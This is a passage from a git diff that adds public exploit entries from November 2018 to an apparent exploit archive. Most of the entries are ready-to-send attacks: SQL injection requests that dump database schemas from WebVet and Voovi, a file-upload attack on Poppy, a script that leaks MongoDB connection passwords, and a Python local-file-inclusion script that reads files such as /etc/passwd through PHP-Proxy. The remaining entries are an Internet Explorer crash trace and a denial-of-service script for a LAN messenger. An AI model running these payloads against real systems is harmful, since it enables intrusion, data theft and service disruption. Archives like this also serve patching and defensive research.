/[PATH]/show.php?op=beasiswa&act=lihat&id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%37%2c%38%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 13:30:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 6079 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45775.txt b/exploits/php/webapps/45775.txt new file mode 100644 index 000000000..977d798fa --- /dev/null +++ b/exploits/php/webapps/45775.txt @@ -0,0 +1,97 @@ +# Exploit Title: WebVet 0.1a - 'id' SQL Injection +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://webvet.exreality.net/ +# Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet_2013_07_08.zip +# Version: 0.1a +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# /[PATH]/client.php +#091 else if (!empty($_POST['form_search_client'])) +#092 { +#093 $searchedClient = new Client(); +#094 if (!empty($_POST['id'])) +#095 $searchedClient->id = $_POST['id']; +#096 if (!empty($_POST['lastname'])) +#097 $searchedClient->lastname = $_POST['lastname']; +#098 if (!empty($_POST['patient'])) +#099 $searchedClient->patient = $_POST['patient']; +#100 +#101 // do the search +#102 $db_connection = db_open(db_user_name, db_user_passw, db_name); +#103 if (!$db_connection) die; +#104 $clients = db_search_client($searchedClient, clients_table_name, $db_connection); +#105 include "clients_view.php"; +#106 } + +# POC: +# 1) +# http://localhost/[PATH]/client.php +# +POST /[PATH]/client.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 525 +id=1 UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 18:13:34 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1229 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/client.php +# +POST /[PATH]/client.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 501 +lastname=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 18:19:04 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1229 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/client.php +# +POST /[PATH]/client.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 499 +patient=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 18:21:05 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1229 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45777.txt b/exploits/php/webapps/45777.txt new file mode 100644 index 000000000..b51d78ca8 --- /dev/null +++ b/exploits/php/webapps/45777.txt @@ -0,0 +1,87 @@ +# Exploit Title: Poppy Web Interface Generator 0.8 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://poppy.dc-development.de/ +# Software Link: https://master.dl.sourceforge.net/project/poppy-beta-rc/poppy_0.8_beta_rc.zip +# Version: 0.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/phpWebFileManager-0.7/index.php +# +POST /[PATH]/phpWebFileManager-0.7/index.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------497318546845924055941951022 +Content-Length: 732 +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_filename" +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_dir" +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_action" +upload_file +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_userfile[0]"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_submit" +File upload +-----------------------------497318546845924055941951022-- +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 12:10:16 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/poppy_app/public/[FILE] +# + + + +#File Upload: +
+ + + + + +
+ +#Create File: +
+ + + + + +
+ +#File Edit: +
+ + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/45779.txt b/exploits/php/webapps/45779.txt new file mode 100644 index 000000000..b2c051b84 --- /dev/null +++ b/exploits/php/webapps/45779.txt @@ -0,0 +1,73 @@ +# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.mongoadmin.org/ +# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe +# Version: 6.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name +# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin +# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin +# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin +# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin + +GET /test.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,* /*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/ +Cookie: PHPSESSID=npbo6p4par2h1flfvc4lv04ok4; mongo-web-admin-session=bvf9kg9nod2gttd6rstk2l4q30 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 16:27:16 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 490 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +header ('Content-type: text/html; charset=UTF-8'); + +$urlemiz= "http://127.0.0.1:6376/webservice/Data/"; +$y="connections.json"; +$jsonveri = file_get_contents($urlemiz.$y); +$ver = json_decode($jsonveri,true); +echo "
\n";
+print_r($ver);
+echo "\n
"; +/** +Array +( + [0] => Array + ( + [id] => 0.81395000 1342373198 + [name] => Default + [host] => localhost + [port] => 27017 + [user] => user1 + [password] => pass1 + ) + + [1] => Array + ( + [id] => 0.54691200 1541333748 + [name] => New connection + [host] => localhost + [port] => 27017 + [user] => user2 + [password] => pass2 + ) + +) \ No newline at end of file diff --git a/exploits/php/webapps/45780.py b/exploits/php/webapps/45780.py new file mode 100755 index 000000000..551a95209 --- /dev/null +++ b/exploits/php/webapps/45780.py @@ -0,0 +1,33 @@ +# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion +# Date: 04.11.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.php-proxy.com/ +# Software Link: https://github.com/Athlon1600/php-proxy-app +# Version: v3.0.3 +# Category: Webapps +# Tested on: XAMPP for Linux +# Description: Any user can read files from the server +# without authentication due to an existing LFI in the following path: +# http://target/index.php?q=file:///[FilePath] + +# PoC + +#!/usr/bin/python + +import urllib2, httplib, sys + +print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS" +print "[*] My Blog - https://www.pentest.com.tr\n" +print "[+] usage: python " + __file__ + " http://" +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) +ip_add = sys.argv[1] + +fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n') + +print "Exploiting....." +print '\n' +URL = "http://" + ip_add + "/index.php?q=file:///" + fd + "" +print urllib2.urlopen(URL).read() \ No newline at end of file diff --git a/exploits/php/webapps/45784.txt b/exploits/php/webapps/45784.txt new file mode 100644 index 000000000..9630ddc79 --- /dev/null +++ b/exploits/php/webapps/45784.txt @@ -0,0 +1,37 @@ + Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.adminspoint.com/voovi/index.php +# Software Link: https://netix.dl.sourceforge.net/project/voovi/voovi%20a%20social%20networking%20script.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/? +# +POST /[PATH]/? HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 165 +user=1' UNION SELECT NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL-- -&password=&action=login&submit= +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 14:22:41 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=v8nhfofpnrt6a4clfqbrp7aa00; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 5987 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/local/45778.txt b/exploits/windows/local/45778.txt new file mode 100644 index 000000000..4067acb45 --- /dev/null +++ b/exploits/windows/local/45778.txt @@ -0,0 +1,193 @@ +# Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-11-03 +# Vendor: Microsoft Corporation +# Product web page: https://www.microsoft.com +# Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949)) +# 11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949)) +# 11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198)) +# 11.0.9600.17843 (Update Versions: 11.0.20 (KB3058515)) +# Tested on: Microsoft Windows 10 (EN) (64bit) +# Microsoft Windows 7 SP1 (EN) (32/64bit) +# Affected module: mshtml.dll +# Affected functions: Tree::Notify_InvalidateDisplay +# CTreeNode::EnsureNoDependentLayoutFixup +# CMarkup::BuildDescendentsList +# References: +# Advisory ID: ZSL-2018-5499 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5499.php + +# Desc: The crash is caused due to a NULL pointer dereference access violation inside the +# 'Tree::Notify_InvalidateDisplay' function while parsing malformed DOM elements. The issue +# was discovered using the Domato fuzzer. + +# Microsoft Internet Explorer 11 Tree::Notify_InvalidateDisplay Null Pointer Dereference +# PoC: https://www.zeroscience.mk/codes/msie11_nullptr_fuzz-33.html.rar + +# Trace: +################################################################################################ + +(e9c.142c): Access violation - code c0000005 (!!! second chance !!!) +eax=21b9efa0 ebx=21b9efac ecx=21b9efa0 edx=00000000 esi=00000000 edi=187a8fc4 +eip=63f04e48 esp=08c39ab8 ebp=08c39ac4 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43: +63f04e48 f70600010000 test dword ptr [esi],100h ds:002b:00000000=???????? +0:007> k + # ChildEBP RetAddr +00 08c39ac4 63a52ddf MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43 +01 08c39bd0 63a523c5 MSHTML!CMarkup::InsertElementInternalNoInclusions+0x1f3 +02 08c39bf8 63a529d3 MSHTML!CMarkup::InsertElementInternal+0x3d +03 08c39c38 63a52a54 MSHTML!CDoc::InsertElement+0x9b +04 08c39cf8 63a3ca96 MSHTML!InsertDOMNodeHelper+0x154 +05 08c39db8 63a3cc73 MSHTML!CElement::InsertBeforeHelper+0x22b +06 08c39ddc 63a3cff3 MSHTML!CElement::InsertBefore+0x2f +07 08c39e70 63a3cf06 MSHTML!CElement::Var_appendChild+0xb3 +08 08c39ea0 6de5e6ee MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x75 +09 08c39f08 6de582cd jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x101 +0a 08c39f50 6df0833d jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 +0b 08c39f74 6dffc483 jscript9!Js::InterpreterStackFrame::OP_CallCommon >+0x53 +0c 08c39fa0 6dffc45c jscript9!Js::InterpreterStackFrame::OP_ProfileReturnTypeCallCommon >+0x1c +0d 08c39fc0 6dffc428 jscript9!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallI+0x2a +0e 08c3a1b0 6dee5371 jscript9!Js::InterpreterStackFrame::Process+0x4e90 +0f 08c3a1e8 6dee53d0 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49 +10 08c3a3d8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x39dc +11 08c3bde4 0d8c0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce +WARNING: Frame IP not in any known module. Following frames may be wrong. +12 08c3bdf0 6de5c22d 0xd8c0fd9 +13 08c3bfe8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x1940 +14 08c3c104 0d8c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce +15 08c3c110 6de582cd 0xd8c0fe1 +16 08c3c158 6de58a05 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 +17 08c3c1cc 6de5893f jscript9!Js::JavascriptFunction::CallRootFunction+0xc1 +18 08c3c214 6de588bf jscript9!ScriptSite::CallRootFunction+0x42 +19 08c3c244 6de5d0f0 jscript9!ScriptSite::Execute+0x61 +1a 08c3c2a0 6de5d02c jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb +1b 08c3c2b8 63a362a4 jscript9!ScriptEngineBase::Execute+0x1c +1c 08c3c374 63a3613e MSHTML!CListenerDispatch::InvokeVar+0x15a +1d 08c3c3a0 63a35e01 MSHTML!CListenerDispatch::Invoke+0x6d +1e 08c3c440 6398e7d2 MSHTML!CEventMgr::_InvokeListeners+0x1fe +1f 08c3c5b4 639d2863 MSHTML!CEventMgr::Dispatch+0x3bb +20 08c3c5dc 63eadc91 MSHTML!CEventMgr::DispatchEvent+0x90 +21 08c3c5f0 63e94da9 MSHTML!CSVGElement::Fire_SVGLoad+0x46 +22 08c3c608 63eadc43 MSHTML!CSVGSVGElement::Fire_SVGLoad+0x19 +23 08c3c620 63dafdc1 MSHTML!CSVGElement::Fire_SVGLoad_Async_Handler+0x23 +24 08c3c64c 6398f25c MSHTML!CAsyncEventQueue::DispatchAllEvents+0x41c3ea +25 08c3c6a0 771462fa MSHTML!GlobalWndProc+0x2d3 +26 08c3c7bc 00a3ee48 user32!InternalCallWinProc+0x23 +27 08c3c7c0 076bafe0 0xa3ee48 +28 08c3c7c4 00000000 0x76bafe0 + + +################################################################################################ + +(15e4.1634): Access violation - code c0000005 (!!! second chance !!!) +eax=00000000 ebx=22a98fa0 ecx=00000061 edx=000000c1 esi=22a96fac edi=0969c384 +eip=63916681 esp=0969c1d8 ebp=0969c200 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +MSHTML!CMarkup::BuildDescendentsList+0x158: +63916681 81b828030000609ffd63 cmp dword ptr [eax+328h],offset MSHTML!__vtguard (63fd9f60) ds:002b:00000328=???????? +0:008> k + # ChildEBP RetAddr +00 0969c200 6384f86d MSHTML!CMarkup::BuildDescendentsList+0x158 +01 0969c350 639b1597 MSHTML!CMarkup::Notify+0x17b +02 0969c3b8 639b1431 MSHTML!CMarkup::OnLoadStatusDone+0x14b +03 0969c3cc 639b078b MSHTML!CMarkup::OnLoadStatus+0xfa +04 0969c810 639aa322 MSHTML!CProgSink::DoUpdate+0x4c7 +05 0969c81c 6382e541 MSHTML!CProgSink::OnMethodCall+0x12 +06 0969c868 6382de4a MSHTML!GlobalWndOnMethodCall+0x16d +07 0969c8b8 771462fa MSHTML!GlobalWndProc+0x2e5 +08 0969c8e4 77146d3a user32!InternalCallWinProc+0x23 +09 0969c95c 771477c4 user32!UserCallWinProcCheckWow+0x109 +0a 0969c9bc 7714788a user32!DispatchMessageWorker+0x3b5 +0b 0969c9cc 6ce3f7c8 user32!DispatchMessageW+0xf +0c 0969fb98 6cf8f738 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 +0d 0969fc58 7732e61c IEFRAME!LCIETab_ThreadProc+0x37b +0e 0969fc70 72f93991 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c +0f 0969fca8 764b336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 +10 0969fcb4 778a9902 kernel32!BaseThreadInitThunk+0xe +11 0969fcf4 778a98d5 ntdll!__RtlUserThreadStart+0x70 +12 0969fd0c 00000000 ntdll!_RtlUserThreadStart+0x1b + +################################################################################################ + +FAILURE_BUCKET_ID: NULL_CLASS_PTR_READ_AVRF_c0000005_MSHTML.dll!Tree::Notify_InvalidateDisplay +BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_READ_INVALID_POINTER_READ_AFTER_CALL_AVRF_MSHTML!Tree::Notify_InvalidateDisplay+19 +FAILURE_EXCEPTION_CODE: c0000005 +FAILURE_IMAGE_NAME: MSHTML.dll + +-- + +(d98.d24): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +MSHTML!Tree::Notify_InvalidateDisplay+0x1f: +555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=???????? +1:022:x86> r +eax=00000000 ebx=204d6b40 ecx=10ba9500 edx=00000001 esi=204d6b40 edi=10ba9500 +eip=555ae81a esp=0535d3f8 ebp=0535d454 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +MSHTML!Tree::Notify_InvalidateDisplay+0x1f: +555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=???????? +1:022:x86> kb + # ChildEBP RetAddr Args to Child +00 0535d400 55d882b4 00000000 19540000 148ca2d0 MSHTML!Tree::Notify_InvalidateDisplay+0x1f +01 0535d454 55d547e9 148ca2a0 0535d4c8 204c7770 MSHTML!Tree::Notify_TextRangeHighlighted+0x140 +02 0535d4ac 55d55337 204c7770 204c7720 00000000 MSHTML!CSelectionRenderingServiceProvider::InvalidateSegment+0x148 +03 0535d4ec 5582e569 148ca270 00000001 19070980 MSHTML!CSelectionRenderingServiceProvider::PrivateClearSegment+0x106 +04 0535d504 556a24db 049c8000 148ca270 00000200 MSHTML!CDoc::RemoveSegment+0x39 +05 0535d52c 5529fe11 0535d55c 5529fdd0 11ef40b0 MSHTML!CSelTrackServices::ClearSelection+0x401d83 +06 0535d548 555e656d 00000000 00000001 00000001 MSHTML!CSelectTracker::BecomeDormant+0x41 +07 0535d568 555f8288 00000000 00000001 00000001 MSHTML!CSelectionManager::HibernateTracker+0x2b +08 0535d590 55f054b1 00000000 00000001 0000000c MSHTML!CSelectionManager::EnsureDefaultTrackerPassive+0x51 +09 0535d5c8 557f8eda 0535d630 555e9c37 00000000 MSHTML!CSelectionManager::DoPendingElementExit+0x429 +0a 0535d5d0 555e9c37 00000000 5555c8fa 00000000 MSHTML!CSelectionManager::DoPendingTasks+0x20f28e +0b 0535d5d8 5555c8fa 00000000 1b034680 00000000 MSHTML!CSelectionManager::EnsureEditContext+0x20 +0c 0535d630 5555c80e 0000000c 00000000 00000000 MSHTML!CSelectionManager::Notify+0x7c +0d 0535d654 5555c7a5 1b034680 0000000c 00000000 MSHTML!CHTMLEditor::Notify+0x51 +0e 0535d670 5555c5fd 1b034680 0000000c 00000000 MSHTML!CHTMLEditorProxy::Notify+0x35 +0f 0535d698 555e7edb 0000000c 00000000 00000000 MSHTML!CDoc::NotifySelection+0x4f +10 0535d92c 555e5c91 00000000 555e5c50 555e5c50 MSHTML!CCaret::UpdateScreenCaret+0xbe +11 0535d940 555baffb 10b7d8f0 049c8000 0000011f MSHTML!CCaret::DeferredUpdateCaret+0x41 +12 0535d9bc 555bb394 d836afd1 00008002 00000000 MSHTML!GlobalWndOnMethodCall+0x21b +13 0535da08 75a9be6b 00190984 00008002 00000000 MSHTML!GlobalWndProc+0xe4 +14 0535da34 75a9833a 555bb2b0 00190984 00008002 USER32!_InternalCallWinProc+0x2b +15 0535db1c 75a97bee 555bb2b0 00000000 00008002 USER32!UserCallWinProcCheckWow+0x3aa +16 0535db98 75a979d0 b9836150 0535fd34 5643485f USER32!DispatchMessageWorker+0x20e +17 0535dba4 5643485f 0535dbe0 00e4b470 008ff230 USER32!DispatchMessageW+0x10 +18 0535fd34 56433e60 0535fe00 56433a50 00e433e8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x46f +19 0535fdf4 5bdcb61c 00e4b470 0535fe18 56488ce0 IEFRAME!LCIETab_ThreadProc+0x410 +1a 0535fe0c 5bd6e6cd 00e433e8 5bd6e640 5bd6e640 msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c +1b 0535fe44 77648484 0089c570 77648460 f7de4b1c IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d +1c 0535fe58 77a7305a 0089c570 005c205f 00000000 KERNEL32!BaseThreadInitThunk+0x24 +1d 0535fea0 77a7302a ffffffff 77a8ec8b 00000000 ntdll_77a10000!__RtlUserThreadStart+0x2f +1e 0535feb0 00000000 5bd6e640 0089c570 00000000 ntdll_77a10000!_RtlUserThreadStart+0x1b +1:022:x86> .exr -1 +ExceptionAddress: 555ae81a (MSHTML!Tree::Notify_InvalidateDisplay+0x0000001f) + ExceptionCode: c0000005 (Access violation) + ExceptionFlags: 00000000 +NumberParameters: 2 + Parameter[0]: 00000000 + Parameter[1]: 00000418 +Attempt to read from address 00000418 +1:022:x86> ub +MSHTML!Tree::Notify_InvalidateDisplay+0x7: +555ae802 f7460800001000 test dword ptr [esi+8],100000h +555ae809 756e jne MSHTML!Tree::Notify_InvalidateDisplay+0x7e (555ae879) +555ae80b 8bc6 mov eax,esi +555ae80d 8b38 mov edi,dword ptr [eax] +555ae80f 85ff test edi,edi +555ae811 7462 je MSHTML!Tree::Notify_InvalidateDisplay+0x7a (555ae875) +555ae813 8bcf mov ecx,edi +555ae815 e8b664d5ff call MSHTML!CElement::GetMarkupPtr (55304cd0) +1:022:x86> +MSHTML!TSmartPointer::operator&+0x12: +555ae7f3 50 push eax +555ae7f4 e8a7f9c6ff call MSHTML!CFilterNativeInfo::Release (5521e1a0) +555ae7f9 ebf4 jmp MSHTML!TSmartPointer::operator&+0xe (555ae7ef) +MSHTML!Tree::Notify_InvalidateDisplay: +555ae7fb 8bff mov edi,edi +555ae7fd 53 push ebx +555ae7fe 56 push esi +555ae7ff 8bf1 mov esi,ecx +555ae801 57 push edi \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45781.py b/exploits/windows_x86-64/dos/45781.py new file mode 100755 index 000000000..d78d8f52b --- /dev/null +++ b/exploits/windows_x86-64/dos/45781.py @@ -0,0 +1,23 @@ +# Exploit Title: Softros LAN Messenger 9.2 - Denial of Service (PoC) +# Discovery by: Victor Mondragón +# Discovery Date: 2018-11-02 +# Vendor Homepage: https://messenger.softros.com/ +# Software Link: https://messenger.softros.com/downloads/ +# Tested Version: 9.2 +# Tested on: Windows 10 Single Language x64 / Windows 7 x64 Service Pack 1 + +# Steps to produce the crash: +# 1.- Run python code: Softros_LAN_Messenger_v9.2.py +# 2.- Open msn.txt and copy content to clipboard +# 2.- Open Softros LAN Messenger +# 3.- Select "Logging" +# 4.- Locate "Log Files Location " +# 5.- Select "Custom Location" and Paste ClipBoard +# 6.- Click on "OK" +# 7.- Crashed + +cod = "\x41" * 2000 + +f = open('msn.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5bc4341c9..1e7a69b9e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6175,6 +6175,7 